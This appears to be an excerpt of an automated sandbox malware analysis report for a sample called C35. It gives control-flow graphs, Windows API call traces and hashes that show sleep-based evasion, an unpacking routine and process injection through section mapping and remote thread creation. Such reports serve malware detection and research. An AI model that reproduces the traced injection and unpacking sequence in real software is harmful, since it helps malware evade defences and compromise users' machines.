                                                                                                                              • Source File: 00000006.00000002.2315529494.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_6b0000_C35.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID: cess$kernel32.dll
                                                                                                                              • API String ID: 4275171209-1230238691
                                                                                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                              • Instruction ID: 1cbfe1bad8ad953d37be5dc3ae992457c84081cda89f7c9b413a08e1e8265b97
                                                                                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                              • Instruction Fuzzy Hash: 275279B5A00229DFDB64CF58C984BA9BBB1BF09304F1480E9E50DAB351DB30AE85DF14

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 382 419a70-419bb0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00515FF0), ref: 00419B4F
                                                                                                                              • GetProcAddress.KERNEL32(00000000,00420518), ref: 00419B8C
                                                                                                                              • VirtualProtect.KERNELBASE(00515E34,00515FEC,00000040,?), ref: 00419BAB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2315244628.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_40b000_C35.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2099061454-3916222277
                                                                                                                              • Opcode ID: 491ec6e3e3ee18dcc8e26f8905b2a401390c51c225c0d3e182c0eb7754f552da
                                                                                                                              • Instruction ID: 9b101dc19ab9e509907a73f40bd9e615ad2773d8f65bdac5e4741cefec9585ad
                                                                                                                              • Opcode Fuzzy Hash: 491ec6e3e3ee18dcc8e26f8905b2a401390c51c225c0d3e182c0eb7754f552da
                                                                                                                              • Instruction Fuzzy Hash: 273164516187C4EAE311CB64FC087523AA2AF79704F448069A148877B3E7BE065ADB6E

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 400 8b16e7-8b1700 401 8b1702-8b1704 400->401 402 8b170b-8b1717 CreateToolhelp32Snapshot 401->402 403 8b1706 401->403 404 8b1719-8b171f 402->404 405 8b1727-8b1734 Module32First 402->405 403->402 404->405 411 8b1721-8b1725 404->411 406 8b173d-8b1745 405->406 407 8b1736-8b1737 call 8b13a6 405->407 412 8b173c 407->412 411->401 411->405 412->406
                                                                                                                              APIs
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008B170F
                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 008B172F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2315796782.00000000008AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 008AE000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_8ae000_C35.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3833638111-0
                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                              • Instruction ID: 25ec24e02dee7173ac107d73f022e1e21d0f6ac54ed4f7643fa163adff3d49d0
                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                              • Instruction Fuzzy Hash: 67F0F6325003116BDB203BF8AC9DFAE72E8FF59721F500528E642DA2C0DF70EC464A65

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 413 6b0e0f-6b0e24 SetErrorMode * 2 414 6b0e2b-6b0e2c 413->414 415 6b0e26 413->415 415->414
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNELBASE(00000400,?,?,006B0223,?,?), ref: 006B0E19
                                                                                                                              • SetErrorMode.KERNELBASE(00000000,?,?,006B0223,?,?), ref: 006B0E1E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2315529494.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_6b0000_C35.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2340568224-0
                                                                                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                              • Instruction ID: 5ec0122905795958cf8b6ea84eb92189ad46b0a0d2fb6fa6a8bc84ef3f06bca4
                                                                                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                              • Instruction Fuzzy Hash: 19D0123114512877D7002A94DC09BCE7F1CDF05B62F008411FB0DD9180C770994147E5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 416 401991-4019ed call 401240 Sleep 428 4019f3-4019f5 416->428 429 4019ee call 4014c4 416->429 430 401a04-401a52 call 401240 428->430 431 4019f7-4019ff call 4015b7 428->431 429->428 431->430
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C35.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                                                                                                              • Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
                                                                                                                              • Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                                                                                                              • Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 445 4019a9-4019ed call 401240 Sleep 457 4019f3-4019f5 445->457 458 4019ee call 4014c4 445->458 459 401a04-401a52 call 401240 457->459 460 4019f7-4019ff call 4015b7 457->460 458->457 460->459
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C35.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                                                                              • Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
                                                                                                                              • Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                                                                              • Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 474 4019af-4019ed call 401240 Sleep 481 4019f3-4019f5 474->481 482 4019ee call 4014c4 474->482 483 401a04-401a52 call 401240 481->483 484 4019f7-4019ff call 4015b7 481->484 482->481 484->483
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C35.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                                                                              • Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
                                                                                                                              • Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                                                                              • Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 498 4019b8-4019ed call 401240 Sleep 502 4019f3-4019f5 498->502 503 4019ee call 4014c4 498->503 504 401a04-401a52 call 401240 502->504 505 4019f7-4019ff call 4015b7 502->505 503->502 505->504
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C35.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                                                                                                              • Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
                                                                                                                              • Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                                                                                                              • Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B
                                                                                                                              APIs
                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008B13F7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2315796782.00000000008AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 008AE000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_8ae000_C35.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                              • Instruction ID: ee70456a628e93b330df1fef1e6eaabcb8f27aee6136df57d07ed7a34b4e25ac
                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                              • Instruction Fuzzy Hash: FD113F79A00208EFDB01DF98C989E99BBF5EF08350F4580A4F9489B361D371EA50DF80
                                                                                                                              APIs
                                                                                                                              • LocalAlloc.KERNELBASE(00000000,00515FEC,0041A04B), ref: 00419A48
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2315244628.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_40b000_C35.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocLocal
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3494564517-0
                                                                                                                              • Opcode ID: 9ec18e11195fab8466a21664cf9d2760616124b952149bfa647060a6f0581e67
                                                                                                                              • Instruction ID: cdbbb9e7b83af8b631a1fc3647d71b0b27ee278e0583f88c42ef53277000976a
                                                                                                                              • Opcode Fuzzy Hash: 9ec18e11195fab8466a21664cf9d2760616124b952149bfa647060a6f0581e67
                                                                                                                              • Instruction Fuzzy Hash: 26B092B8502600DBD2408B60EC48F953A68E398202F009260FA0085160E7700805AA10
                                                                                                                              APIs
                                                                                                                              • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00419D04
                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00419D1F
                                                                                                                              • HeapDestroy.KERNEL32(00000000), ref: 00419D3E
                                                                                                                              • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00419D4D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2315244628.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_40b000_C35.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4159173863-0
                                                                                                                              • Opcode ID: 10b99885ae077d5513f7b4f4fe7ada249d912d148d05b578c42a7b65b8aafc25
                                                                                                                              • Instruction ID: 6966600bf98115fc682df4bae7263d4ee42c52adae4737bd1ec5881763e77970
                                                                                                                              • Opcode Fuzzy Hash: 10b99885ae077d5513f7b4f4fe7ada249d912d148d05b578c42a7b65b8aafc25
                                                                                                                              • Instruction Fuzzy Hash: B9018474600204DBE750EB64FC59BDA77A8E71C306F408176FA4996290EB745DC8CBD9
                                                                                                                              APIs
                                                                                                                              • BuildCommDCBW.KERNEL32(00000000,?), ref: 00419C64
                                                                                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00419C76
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2315244628.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_40b000_C35.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuildCommEnvironmentFreeStrings
                                                                                                                              • String ID: -
                                                                                                                              • API String ID: 2991353152-2547889144
                                                                                                                              • Opcode ID: f4b958283a58c4c84f181a912c03a312a762f8a4ec0123b7dccd55bff0bc5cba
                                                                                                                              • Instruction ID: eedbb3df8d483a19463c8038d1f41fe70976e2133a91f77c3139b26c4217ee6d
                                                                                                                              • Opcode Fuzzy Hash: f4b958283a58c4c84f181a912c03a312a762f8a4ec0123b7dccd55bff0bc5cba
                                                                                                                              • Instruction Fuzzy Hash: 12F02231844204A6DB209FA8DD907EF7BE8E709320F20022AE98467381E3380D86D7DA

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:6.7%
                                                                                                                              Dynamic/Decrypted Code Coverage:19.1%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:257
                                                                                                                              Total number of Limit Nodes:7
                                                                                                                              execution_graph 4844 40b000 4845 40b004 4844->4845 4848 40b03c 4845->4848 4851 40b784 RtlLeaveCriticalSection 4848->4851 4850 40b033 4851->4850 4762 403043 4763 40319a 4762->4763 4764 40306d 4762->4764 4764->4763 4765 403128 RtlCreateUserThread NtTerminateProcess 4764->4765 4765->4763 5021 419c86 5022 419c90 5021->5022 5023 419c40 SetPriorityClass 5022->5023 5024 419cad 5022->5024 5023->5022 5055 40b308 5056 40b374 GetConsoleOutputCP WideCharToMultiByte 5055->5056 5057 40b325 5055->5057 5058 40b39b WriteConsoleA 5056->5058 5062 40b33d 5056->5062 5059 40b333 5057->5059 5066 40b84a CreateFileA 5057->5066 5058->5062 5061 40b344 WriteConsoleW 5059->5061 5059->5062 5061->5062 5063 40b35a 5061->5063 5063->5062 5064 40b363 GetLastError 5063->5064 5064->5062 5065 40b36e 5064->5065 5065->5056 5066->5059 4852 40b20a 4853 40b20f 4852->4853 4854 40b21d 4853->4854 4856 40b7ab 4853->4856 4858 40b7b7 4856->4858 4857 40b82c __fcloseall 4857->4854 4858->4857 4859 40b801 RtlDeleteCriticalSection 4858->4859 4861 40b90d 4858->4861 4859->4858 4862 40b919 4861->4862 4863 40b92d 4862->4863 4869 40b22a 4862->4869 4863->4858 4870 40b23c 4869->4870 4871 40b25e RtlEnterCriticalSection 4869->4871 4870->4871 4872 40b244 4870->4872 4871->4872 4873 40b896 4872->4873 4874 40b8c6 __fileno __freebuf 4873->4874 4876 40b8aa 4873->4876 4874->4876 4880 40ba25 4874->4880 4877 40b981 4876->4877 4903 40b29d 4877->4903 4879 40b987 4879->4863 4882 40ba31 4880->4882 4881 40ba39 4881->4876 4882->4881 4883 40b6e4 ___lock_fhandle RtlEnterCriticalSection 4882->4883 4884 40baa9 4883->4884 4885 40babe 4884->4885 4888 40b989 4884->4888 4895 40bae8 4885->4895 4890 40b999 __lseeki64_nolock 4888->4890 4889 40b9ef 4898 40b5e7 4889->4898 4890->4889 4892 40b9d9 CloseHandle 4890->4892 4892->4889 4893 40b9e5 GetLastError 4892->4893 4893->4889 4902 40b784 RtlLeaveCriticalSection 4895->4902 4897 40baf0 4897->4881 4899 40b649 4898->4899 4901 40b5f8 4898->4901 4899->4885 4900 40b643 SetStdHandle 4900->4899 4901->4899 4901->4900 4902->4897 4904 40b2cd RtlLeaveCriticalSection 4903->4904 4905 40b2ae 4903->4905 4904->4879 4905->4904 4906 40b2b5 4905->4906 4906->4879 4937 4014cf 4938 4014d3 4937->4938 4939 401660 NtDuplicateObject 4938->4939 4947 401571 4938->4947 4940 40167d NtCreateSection 4939->4940 4939->4947 4941 4016a3 NtMapViewOfSection 4940->4941 4942 4016fd NtCreateSection 4940->4942 4941->4942 4943 4016c6 NtMapViewOfSection 4941->4943 4944 401729 4942->4944 4942->4947 4943->4942 4945 4016e4 4943->4945 4946 401733 NtMapViewOfSection 4944->4946 4944->4947 4945->4942 4946->4947 4948 40175a NtMapViewOfSection 4946->4948 4948->4947 4907 40b011 4908 40b016 4907->4908 4909 40b03c RtlLeaveCriticalSection 4908->4909 4910 40b033 4909->4910 5071 4015d5 5072 4015e4 5071->5072 5073 401660 NtDuplicateObject 5072->5073 5081 40177c 5072->5081 5074 40167d NtCreateSection 5073->5074 5073->5081 5075 4016a3 NtMapViewOfSection 5074->5075 5076 4016fd NtCreateSection 5074->5076 5075->5076 5077 4016c6 NtMapViewOfSection 5075->5077 5078 401729 5076->5078 5076->5081 5077->5076 5079 4016e4 5077->5079 5080 401733 NtMapViewOfSection 5078->5080 5078->5081 5079->5076 5080->5081 5082 40175a NtMapViewOfSection 5080->5082 5082->5081 4766 402f16 4767 402f1a 4766->4767 4769 402fa2 4767->4769 4770 401991 4767->4770 4771 4019a0 4770->4771 4772 4019d8 Sleep 4771->4772 4774 4019f3 4772->4774 4775 4014c4 4772->4775 4774->4769 4776 4014d3 4775->4776 4777 401660 NtDuplicateObject 4776->4777 4785 401571 4776->4785 4778 40167d NtCreateSection 4777->4778 4777->4785 4779 4016a3 NtMapViewOfSection 4778->4779 4780 4016fd NtCreateSection 4778->4780 4779->4780 4781 4016c6 NtMapViewOfSection 4779->4781 4782 401729 4780->4782 4780->4785 4781->4780 4783 4016e4 4781->4783 4784 401733 NtMapViewOfSection 4782->4784 4782->4785 4783->4780 4784->4785 4786 40175a NtMapViewOfSection 4784->4786 4785->4774 4786->4785 4949 40b2d9 4950 40b2fc RtlLeaveCriticalSection 4949->4950 4951 40b2e9 4949->4951 5025 402e9a 5026 402e5f 5025->5026 5028 402eaf 5025->5028 5027 401991 8 API calls 5029 402fa2 5027->5029 5028->5027 5028->5029 4805 67003c 4806 670049 4805->4806 4818 670e0f SetErrorMode SetErrorMode 4806->4818 4811 670265 4812 6702ce VirtualProtect 4811->4812 4814 67030b 4812->4814 4813 670439 VirtualFree 4817 6704be LoadLibraryA 4813->4817 4814->4813 4816 6708c7 4817->4816 4819 670223 4818->4819 4820 670d90 4819->4820 4821 670dad 4820->4821 4822 670dbb GetPEB 4821->4822 4823 670238 VirtualAlloc 4821->4823 4822->4823 4823->4811 4911 670005 4916 67092b GetPEB 4911->4916 4913 670030 4918 67003c 4913->4918 4917 670972 4916->4917 4917->4913 4919 670049 4918->4919 4920 670e0f 2 API calls 4919->4920 4921 670223 4920->4921 4922 670d90 GetPEB 4921->4922 4923 670238 VirtualAlloc 4922->4923 4924 670265 4923->4924 4925 6702ce VirtualProtect 4924->4925 4927 67030b 4925->4927 4926 670439 VirtualFree 4930 6704be LoadLibraryA 4926->4930 4927->4926 4929 6708c7 4930->4929 5030 40b562 5031 40b580 __lseeki64_nolock 5030->5031 5032 40b599 SetFilePointer 5031->5032 5034 40b588 5031->5034 5033 40b5b1 GetLastError 5032->5033 5032->5034 5033->5034 4964 40b4e4 4967 40b3cd 4964->4967 4968 40b3e0 4967->4968 4972 40b3e9 4967->4972 4969 40b440 4968->4969 4970 40b4bd MultiByteToWideChar 4968->4970 4968->4972 4971 40b453 MultiByteToWideChar 4969->4971 4969->4972 4970->4972 4971->4972 4931 670001 4932 670005 4931->4932 4933 67092b GetPEB 4932->4933 4934 670030 4933->4934 4935 67003c 7 API calls 4934->4935 4936 670038 4935->4936 4973 402ee7 4975 402ef9 4973->4975 4974 402fa2 4975->4974 4976 401991 8 API calls 4975->4976 4976->4974 5119 4019a9 5120 4019a0 5119->5120 5121 4019d8 Sleep 5120->5121 5122 4014c4 7 API calls 5121->5122 5123 4019f3 5121->5123 5122->5123 4824 40b26b 4825 40b278 4824->4825 4826 40b28e RtlEnterCriticalSection 4824->4826 4703 41a170 4706 419d70 4703->4706 4705 41a175 4708 419d90 4706->4708 4707 419d99 GetVolumeInformationA 4707->4708 4708->4707 4709 419e31 4708->4709 4710 419e4a InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode 4709->4710 4715 419f59 4709->4715 4712 419e8e 7 API calls 4710->4712 4711 419f65 SetCommState 4711->4715 4713 419f37 4712->4713 4714 419f2b ObjectPrivilegeAuditAlarmA 4712->4714 4717 419f40 WaitForSingleObject 4713->4717 4718 419f48 4713->4718 4714->4713 4715->4711 4716 419f7e 4715->4716 4719 41a046 4716->4719 4720 419f8b 9 API calls 4716->4720 4717->4718 4718->4715 4733 419a40 LocalAlloc 4719->4733 4731 41a019 4720->4731 4724 41a04b LoadLibraryA 4734 419a70 GetModuleHandleW GetProcAddress VirtualProtect 4724->4734 4725 41a09d 4735 419cd0 4725->4735 4727 41a0b9 MoveFileA 4728 41a0a2 4727->4728 4728->4727 4729 41a0e3 InterlockedCompareExchange 4728->4729 4732 41a0fd 4728->4732 4729->4728 4731->4719 4732->4705 4733->4724 4734->4725 4736 419cf9 QueryDosDeviceW 4735->4736 4737 419d0a 4735->4737 4736->4737 4746 419c10 4737->4746 4740 419d25 4749 419c50 4740->4749 4741 419d1d FreeEnvironmentStringsW 4741->4740 4744 419d53 4744->4728 4745 419d3c HeapDestroy GetNumaProcessorNode 4745->4744 4747 419c21 FatalAppExitW GetModuleHandleA 4746->4747 4748 419c33 4746->4748 4747->4748 4748->4740 4748->4741 4750 419c6c 4749->4750 4751 419c5e BuildCommDCBW 4749->4751 4752 419c74 FreeEnvironmentStringsA 4750->4752 4754 419c7c 4750->4754 4751->4754 4752->4754 4753 419cad 4753->4744 4753->4745 4754->4753 4756 419c40 4754->4756 4759 419bc0 4756->4759 4760 419beb 4759->4760 4761 419bdc SetPriorityClass 4759->4761 4760->4754 4761->4760 5035 401975 5036 401979 5035->5036 5037 4014c4 7 API calls 5036->5037 5038 4019f3 5037->5038 4827 40b078 4828 40b084 4827->4828 4829 40b08c 4828->4829 4836 40b6e4 4828->4836 4831 40b0ed __lseeki64_nolock 4832 40b119 4831->4832 4833 40b102 FlushFileBuffers 4831->4833 4840 40b14f 4832->4840 4833->4832 4834 40b10e GetLastError 4833->4834 4834->4832 4839 40b6f0 ___lock_fhandle 4836->4839 4837 40b750 RtlEnterCriticalSection 4838 40b76d 4837->4838 4838->4831 4839->4837 4839->4838 4843 40b784 RtlLeaveCriticalSection 4840->4843 4842 40b157 4842->4829 4843->4842 4787 76008f 4790 76009f 4787->4790 4791 7600ae 4790->4791 4794 76083f 4791->4794 4796 76085a 4794->4796 4795 760863 CreateToolhelp32Snapshot 4795->4796 4797 76087f Module32First 4795->4797 4796->4795 4796->4797 4798 76009e 4797->4798 4799 76088e 4797->4799 4801 7604fe 4799->4801 4802 760529 4801->4802 4803 760572 4802->4803 4804 76053a VirtualAlloc 4802->4804 4803->4803 4804->4803

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 419d70-419d8e 1 419d90-419d97 0->1 2 419dc5-419dcb 1->2 3 419d99-419dbf GetVolumeInformationA 1->3 4 419dcd-419dd9 2->4 5 419ddf-419de9 2->5 3->2 4->5 6 419e24-419e2b 5->6 7 419deb-419e1a 5->7 6->1 8 419e31-419e44 6->8 7->6 9 419f59-419f5f 8->9 10 419e4a-419f29 InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode GetDefaultCommConfigA CopyFileW CreatePipe GetEnvironmentStrings WriteConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 8->10 12 419f65-419f73 SetCommState 9->12 15 419f37-419f3e 10->15 16 419f2b-419f31 ObjectPrivilegeAuditAlarmA 10->16 17 419f75-419f7c 12->17 18 419f7e-419f85 12->18 19 419f40-419f42 WaitForSingleObject 15->19 20 419f48-419f56 15->20 16->15 17->12 17->18 21 41a046-41a055 call 419a40 18->21 22 419f8b-41a040 GetConsoleAliasesLengthW GetComputerNameA CopyFileW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType FormatMessageA GetLongPathNameA GetCommTimeouts 18->22 19->20 20->9 27 41a057-41a068 21->27 28 41a08d-41a098 LoadLibraryA call 419a70 21->28 22->21 30 41a070-41a080 27->30 35 41a09d-41a0ae call 419cd0 28->35 33 41a082 30->33 34 41a088-41a08b 30->34 33->34 34->28 34->30 40 41a0b0-41a0b7 35->40 41 41a0b9-41a0c7 MoveFileA 40->41 42 41a0cd-41a0d3 40->42 41->42 43 41a0d5 call 419a60 42->43 44 41a0da-41a0e1 42->44 43->44 48 41a0e3-41a0ee InterlockedCompareExchange 44->48 49 41a0f4-41a0fb 44->49 48->49 49->40 50 41a0fd-41a10d 49->50 53 41a110-41a120 50->53 55 41a122 53->55 56 41a129-41a12c 53->56 55->56 56->53 57 41a12e-41a139 56->57 58 41a140-41a145 57->58 59 41a147-41a14d 58->59 60 41a14f-41a155 58->60 59->60 61 41a157-41a164 59->61 60->58 60->61
                                                                                                                              APIs
                                                                                                                              • GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 00419DBF
                                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00419E53
                                                                                                                              • GetFocus.USER32 ref: 00419E59
                                                                                                                              • ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00419E64
                                                                                                                              • FindAtomW.KERNEL32(00000000), ref: 00419E6B
                                                                                                                              • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00419E73
                                                                                                                              • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00419E9A
                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 00419EA3
                                                                                                                              • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00419EB9
                                                                                                                              • GetEnvironmentStrings.KERNEL32 ref: 00419EBF
                                                                                                                              • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00419F04
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00419F13
                                                                                                                              • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00419F1C
                                                                                                                              • ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00419F31
                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00419F42
                                                                                                                              • SetCommState.KERNELBASE(00000000,00000000), ref: 00419F69
                                                                                                                              • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00419F9A
                                                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00419FAE
                                                                                                                              • CopyFileW.KERNEL32(0041C3E4,0041C3B8,00000000), ref: 00419FBF
                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00419FC6
                                                                                                                              • GetConsoleAliasExesLengthA.KERNEL32 ref: 00419FCC
                                                                                                                              • GetBinaryType.KERNEL32(0041C400,?), ref: 00419FDE
